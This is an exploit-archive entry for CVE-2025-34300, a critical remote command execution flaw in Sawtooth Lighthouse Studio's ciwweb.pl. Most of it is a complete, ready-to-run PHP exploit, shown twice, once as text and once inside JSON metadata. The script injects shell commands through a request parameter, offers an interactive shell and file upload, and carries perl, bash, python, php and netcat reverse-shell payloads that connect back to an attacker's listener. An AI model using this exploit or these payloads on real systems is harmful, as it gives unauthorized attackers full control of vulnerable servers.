📄 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864

10 / 10

CRITICAL

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H

Description

Sawtooth Lighthouse Studio version 9.16.14 proof of concept remote command execution exploit...

Visit Original Source

Basic Information

ID PACKETSTORM:215864

Published Feb 19, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Sawtooth Lighthouse Studio 9.16.14 RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://sawtoothsoftware.com |
=============================================================================================================================================

[+] Summary : CVE-2025-34300 represents a critical Remote Code Execution (RCE) vulnerability in Sawtooth Software's Lighthouse Studio survey platform, specifically affecting the ciwweb.pl web application component

[+] POC :

# Vulnerability Check
php exploit.php --url http://target.com --check

# Command Execution
php exploit.php --url http://target.com --cmd "whoami"

# Interactive Shell
php exploit.php --url http://target.com --shell

# Reverse Shell
php exploit.php --url http://target.com --reverse --lhost YOUR_IP --lport 4444

<?php

class CVE_2025_34300_Exploit {

private $target_url;
private $timeout = 30;
private $proxy = null;

public function __construct($target_url) {
$this->target_url = rtrim($target_url, '/');
}

public function setProxy($proxy) {
$this->proxy = $proxy;
}

public function check() {
echo "[*] Checking target: {$this->target_url}\n";

$params = [
'hid_javascript' => '1'
];

$response = $this->sendRequest('/cgi-bin/ciwweb.pl', $params);

if (!$response) {
echo "[-] No response from target\n";
return false;
}

if (preg_match('/Lighthouse Studio (\d+_\d+_\d+)/', $response, $matches)) {
$version_str = str_replace('_', '.', $matches[1]);
echo "[+] Extracted version: {$version_str}\n";

if (version_compare($version_str, '9.16.14', '<')) {
echo "[+] Target appears to be vulnerable!\n";
return true;
} else {
echo "[-] Target is patched (version >= 9.16.14)\n";
return false;
}
}

if (strpos($response, 'Lighthouse Studio') !== false) {
echo "[+] Lighthouse Studio detected (version extraction failed)\n";
return true;
}

echo "[-] Lighthouse Studio not detected\n";
return false;
}

public function executeCommand($command) {
echo "[*] Attempting to execute command: {$command}\n";
$encoded_cmd = urlencode($command);
$params = [
'hid_javascript' => '1',
'hid_Random_ACARAT' => '[%`' . $command . '`%]'
];

$response = $this->sendRequest('/cgi-bin/ciwweb.pl', $params);

if (!$response) {
echo "[-] No response received\n";
return null;
}

if (preg_match('/\[\%`(.*?)`\%\]/s', $response, $matches)) {
$output = $matches[1];
echo "[+] Command output:\n";
echo $output . "\n";
return $output;
}

echo "[-] No command output found in response\n";

if (strpos($response, 'Cannot find the study name') !== false) {
echo "[-] Invalid STUDYNAME parameter\n";
}

return null;
}

public function reverseShell($lhost, $lport) {
$payloads = [
'perl' => "perl -e 'use Socket;\$i=\"$lhost\";\$p=$lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
'bash' => "bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'",
'python' => "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$lhost\",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
'php' => "php -r '\$sock=fsockopen(\"$lhost\",$lport);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
'nc' => "nc -e /bin/sh $lhost $lport || nc -c sh $lhost $lport || rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $lhost $lport >/tmp/f"
];

echo "[*] Available reverse shell payloads:\n";
foreach (array_keys($payloads) as $i => $type) {
echo " [{$i}] {$type}\n";
}

echo "Select payload type: ";
$choice = trim(fgets(STDIN));
$types = array_keys($payloads);

if (isset($types[$choice])) {
$type = $types[$choice];
$cmd = $payloads[$type];
echo "[*] Using {$type} reverse shell\n";
return $this->executeCommand($cmd);
}

return null;
}

public function uploadFile($local_file, $remote_path) {
if (!file_exists($local_file)) {
echo "[-] Local file not found: {$local_file}\n";
return false;
}

$content = file_get_contents($local_file);
$encoded = base64_encode($content);
$commands = [
'linux' => "echo '{$encoded}' | base64 -d > {$remote_path} && chmod +x {$remote_path}",
'windows' => "powershell -Command \"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('{$encoded}')) | Out-File -FilePath '{$remote_path}'\""
];

echo "[*] Attempting Linux file upload...\n";
$result = $this->executeCommand($commands['linux']);

if ($result === null) {
echo "[*] Attempting Windows file upload...\n";
$result = $this->executeCommand($commands['windows']);
}

return $result !== null;
}

private function sendRequest($path, $params = []) {
$url = $this->target_url . $path;

if (!empty($params)) {
$url .= '?' . http_build_query($params);
}

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);

if ($this->proxy) {
curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
}

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
echo "[-] cURL error: " . curl_error($ch) . "\n";
curl_close($ch);
return false;
}

curl_close($ch);

if ($http_code != 200) {
echo "[-] HTTP {$http_code} received\n";
return false;
}

return $response;
}

public function interactiveShell() {
if (!$this->check()) {
echo "[-] Target not vulnerable or check failed\n";
return;
}

echo "[*] Starting interactive shell (type 'exit' to quit)\n";

while (true) {
echo "cmd> ";
$cmd = trim(fgets(STDIN));

if (empty($cmd)) {
continue;
}

if (strtolower($cmd) == 'exit' || strtolower($cmd) == 'quit') {
break;
}

$this->executeCommand($cmd);
}
}
}

function showHelp() {
echo "by indoushka Exploit - Sawtooth Lighthouse Studio RCE\n";
echo "Usage:\n";
echo " php exploit.php --check --url http://target.com\n";
echo " php exploit.php --cmd \"whoami\" --url http://target.com\n";
echo " php exploit.php --shell --url http://target.com\n";
echo " php exploit.php --reverse --lhost 1.2.3.4 --lport 4444 --url http://target.com\n";
echo "\nOptions:\n";
echo " --url Target URL (required)\n";
echo " --check Check if vulnerable\n";
echo " --cmd Execute single command\n";
echo " --shell Start interactive shell\n";
echo " --reverse Start reverse shell\n";
echo " --lhost Listener IP for reverse shell\n";
echo " --lport Listener port for reverse shell\n";
echo " --proxy HTTP proxy (optional)\n";
echo " --upload Upload file: --upload local.txt,/remote/path.txt\n";
}

if (php_sapi_name() === 'cli') {
$options = getopt('', [
'url:',
'check',
'cmd:',
'shell',
'reverse',
'lhost:',
'lport:',
'proxy:',
'upload:',
'help'
]);

if (isset($options['help']) || !isset($options['url'])) {
showHelp();
exit();
}

$exploit = new CVE_2025_34300_Exploit($options['url']);

if (isset($options['proxy'])) {
$exploit->setProxy($options['proxy']);
}

if (isset($options['check'])) {
$exploit->check();
} elseif (isset($options['cmd'])) {
$exploit->check();
$exploit->executeCommand($options['cmd']);
} elseif (isset($options['shell'])) {
$exploit->interactiveShell();
} elseif (isset($options['reverse'])) {
if (!isset($options['lhost']) || !isset($options['lport'])) {
echo "[-] --lhost and --lport required for reverse shell\n";
exit(1);
}
$exploit->check();
$exploit->reverseShell($options['lhost'], $options['lport']);
} elseif (isset($options['upload'])) {
list($local, $remote) = explode(',', $options['upload'], 2);
$exploit->check();
$exploit->uploadFile($local, $remote);
}
} else {
echo "This script is designed for command line use.\n";
showHelp();
}

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-19T16:33:40",
    "description": "Sawtooth Lighthouse Studio version 9.16.14 proof of concept remote command execution exploit...",
    "published": "2026-02-19T00:00:00",
    "modified": "2026-02-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215864",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-34300"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Sawtooth Lighthouse Studio 9.16.14 RCE                                                                                      |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://sawtoothsoftware.com                                                                                                |\n    =============================================================================================================================================\n    \n    [+] Summary    : CVE-2025-34300 represents a critical Remote Code Execution (RCE) vulnerability in Sawtooth Software's Lighthouse Studio survey platform, specifically affecting the ciwweb.pl web application component\n    \n    [+] POC :\n    \n    # Vulnerability Check\n    php exploit.php --url http://target.com --check\n    \n    # Command Execution\n    php exploit.php --url http://target.com --cmd \"whoami\"\n    \n    # Interactive Shell\n    php exploit.php --url http://target.com --shell\n    \n    # Reverse Shell\n    php exploit.php --url http://target.com --reverse --lhost YOUR_IP --lport 4444\n    \n    <?php\n    \n    \n    class CVE_2025_34300_Exploit {\n        \n        private $target_url;\n        private $timeout = 30;\n        private $proxy = null;\n        \n        public function __construct($target_url) {\n            $this->target_url = rtrim($target_url, '/');\n        }\n        \n        public function setProxy($proxy) {\n            $this->proxy = $proxy;\n        }\n    \n        public function check() {\n            echo \"[*] Checking target: {$this->target_url}\\n\";\n            \n            $params = [\n                'hid_javascript' => '1'\n            ];\n            \n            $response = $this->sendRequest('/cgi-bin/ciwweb.pl', $params);\n            \n            if (!$response) {\n                echo \"[-] No response from target\\n\";\n                return false;\n            }\n    \n            if (preg_match('/Lighthouse Studio (\\d+_\\d+_\\d+)/', $response, $matches)) {\n                $version_str = str_replace('_', '.', $matches[1]);\n                echo \"[+] Extracted version: {$version_str}\\n\";\n    \n                if (version_compare($version_str, '9.16.14', '<')) {\n                    echo \"[+] Target appears to be vulnerable!\\n\";\n                    return true;\n                } else {\n                    echo \"[-] Target is patched (version >= 9.16.14)\\n\";\n                    return false;\n                }\n            }\n    \n            if (strpos($response, 'Lighthouse Studio') !== false) {\n                echo \"[+] Lighthouse Studio detected (version extraction failed)\\n\";\n                return true;\n            }\n            \n            echo \"[-] Lighthouse Studio not detected\\n\";\n            return false;\n        }\n    \n        public function executeCommand($command) {\n            echo \"[*] Attempting to execute command: {$command}\\n\";\n            $encoded_cmd = urlencode($command);\n            $params = [\n                'hid_javascript' => '1',\n                'hid_Random_ACARAT' => '[%`' . $command . '`%]'\n            ];\n            \n            $response = $this->sendRequest('/cgi-bin/ciwweb.pl', $params);\n            \n            if (!$response) {\n                echo \"[-] No response received\\n\";\n                return null;\n            }\n    \n            if (preg_match('/\\[\\%`(.*?)`\\%\\]/s', $response, $matches)) {\n                $output = $matches[1];\n                echo \"[+] Command output:\\n\";\n                echo $output . \"\\n\";\n                return $output;\n            }\n            \n            echo \"[-] No command output found in response\\n\";\n    \n            if (strpos($response, 'Cannot find the study name') !== false) {\n                echo \"[-] Invalid STUDYNAME parameter\\n\";\n            }\n            \n            return null;\n        }\n    \n        public function reverseShell($lhost, $lport) {\n            $payloads = [\n                'perl' => \"perl -e 'use Socket;\\$i=\\\"$lhost\\\";\\$p=$lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in(\\$p,inet_aton(\\$i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");};'\",\n                'bash' => \"bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'\",\n                'python' => \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$lhost\\\",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\",\n                'php' => \"php -r '\\$sock=fsockopen(\\\"$lhost\\\",$lport);exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\",\n                'nc' => \"nc -e /bin/sh $lhost $lport || nc -c sh $lhost $lport || rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $lhost $lport >/tmp/f\"\n            ];\n            \n            echo \"[*] Available reverse shell payloads:\\n\";\n            foreach (array_keys($payloads) as $i => $type) {\n                echo \"    [{$i}] {$type}\\n\";\n            }\n            \n            echo \"Select payload type: \";\n            $choice = trim(fgets(STDIN));\n            $types = array_keys($payloads);\n            \n            if (isset($types[$choice])) {\n                $type = $types[$choice];\n                $cmd = $payloads[$type];\n                echo \"[*] Using {$type} reverse shell\\n\";\n                return $this->executeCommand($cmd);\n            }\n            \n            return null;\n        }\n    \n        public function uploadFile($local_file, $remote_path) {\n            if (!file_exists($local_file)) {\n                echo \"[-] Local file not found: {$local_file}\\n\";\n                return false;\n            }\n            \n            $content = file_get_contents($local_file);\n            $encoded = base64_encode($content);\n            $commands = [\n                'linux' => \"echo '{$encoded}' | base64 -d > {$remote_path} && chmod +x {$remote_path}\",\n                'windows' => \"powershell -Command \\\"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('{$encoded}')) | Out-File -FilePath '{$remote_path}'\\\"\"\n            ];\n    \n            echo \"[*] Attempting Linux file upload...\\n\";\n            $result = $this->executeCommand($commands['linux']);\n            \n            if ($result === null) {\n                echo \"[*] Attempting Windows file upload...\\n\";\n                $result = $this->executeCommand($commands['windows']);\n            }\n            \n            return $result !== null;\n        }\n    \n        private function sendRequest($path, $params = []) {\n            $url = $this->target_url . $path;\n            \n            if (!empty($params)) {\n                $url .= '?' . http_build_query($params);\n            }\n            \n            $ch = curl_init();\n            curl_setopt_array($ch, [\n                CURLOPT_URL => $url,\n                CURLOPT_RETURNTRANSFER => true,\n                CURLOPT_TIMEOUT => $this->timeout,\n                CURLOPT_FOLLOWLOCATION => true,\n                CURLOPT_SSL_VERIFYPEER => false,\n                CURLOPT_SSL_VERIFYHOST => false,\n                CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n            ]);\n            \n            if ($this->proxy) {\n                curl_setopt($ch, CURLOPT_PROXY, $this->proxy);\n            }\n            \n            $response = curl_exec($ch);\n            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\n            \n            if (curl_errno($ch)) {\n                echo \"[-] cURL error: \" . curl_error($ch) . \"\\n\";\n                curl_close($ch);\n                return false;\n            }\n            \n            curl_close($ch);\n            \n            if ($http_code != 200) {\n                echo \"[-] HTTP {$http_code} received\\n\";\n                return false;\n            }\n            \n            return $response;\n        }\n    \n        public function interactiveShell() {\n            if (!$this->check()) {\n                echo \"[-] Target not vulnerable or check failed\\n\";\n                return;\n            }\n            \n            echo \"[*] Starting interactive shell (type 'exit' to quit)\\n\";\n            \n            while (true) {\n                echo \"cmd> \";\n                $cmd = trim(fgets(STDIN));\n                \n                if (empty($cmd)) {\n                    continue;\n                }\n                \n                if (strtolower($cmd) == 'exit' || strtolower($cmd) == 'quit') {\n                    break;\n                }\n                \n                $this->executeCommand($cmd);\n            }\n        }\n    }\n    \n    function showHelp() {\n        echo \"by indoushka Exploit - Sawtooth Lighthouse Studio RCE\\n\";\n        echo \"Usage:\\n\";\n        echo \"  php exploit.php --check --url http://target.com\\n\";\n        echo \"  php exploit.php --cmd \\\"whoami\\\" --url http://target.com\\n\";\n        echo \"  php exploit.php --shell --url http://target.com\\n\";\n        echo \"  php exploit.php --reverse --lhost 1.2.3.4 --lport 4444 --url http://target.com\\n\";\n        echo \"\\nOptions:\\n\";\n        echo \"  --url       Target URL (required)\\n\";\n        echo \"  --check     Check if vulnerable\\n\";\n        echo \"  --cmd       Execute single command\\n\";\n        echo \"  --shell     Start interactive shell\\n\";\n        echo \"  --reverse   Start reverse shell\\n\";\n        echo \"  --lhost     Listener IP for reverse shell\\n\";\n        echo \"  --lport     Listener port for reverse shell\\n\";\n        echo \"  --proxy     HTTP proxy (optional)\\n\";\n        echo \"  --upload    Upload file: --upload local.txt,/remote/path.txt\\n\";\n    }\n    \n    if (php_sapi_name() === 'cli') {\n        $options = getopt('', [\n            'url:',\n            'check',\n            'cmd:',\n            'shell',\n            'reverse',\n            'lhost:',\n            'lport:',\n            'proxy:',\n            'upload:',\n            'help'\n        ]);\n        \n        if (isset($options['help']) || !isset($options['url'])) {\n            showHelp();\n            exit();\n        }\n        \n        $exploit = new CVE_2025_34300_Exploit($options['url']);\n        \n        if (isset($options['proxy'])) {\n            $exploit->setProxy($options['proxy']);\n        }\n        \n        if (isset($options['check'])) {\n            $exploit->check();\n        } elseif (isset($options['cmd'])) {\n            $exploit->check();\n            $exploit->executeCommand($options['cmd']);\n        } elseif (isset($options['shell'])) {\n            $exploit->interactiveShell();\n        } elseif (isset($options['reverse'])) {\n            if (!isset($options['lhost']) || !isset($options['lport'])) {\n                echo \"[-] --lhost and --lport required for reverse shell\\n\";\n                exit(1);\n            }\n            $exploit->check();\n            $exploit->reverseShell($options['lhost'], $options['lport']);\n        } elseif (isset($options['upload'])) {\n            list($local, $remote) = explode(',', $options['upload'], 2);\n            $exploit->check();\n            $exploit->uploadFile($local, $remote);\n        }\n    } else {\n        echo \"This script is designed for command line use.\\n\";\n        showHelp();\n    }\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215864",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215864/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply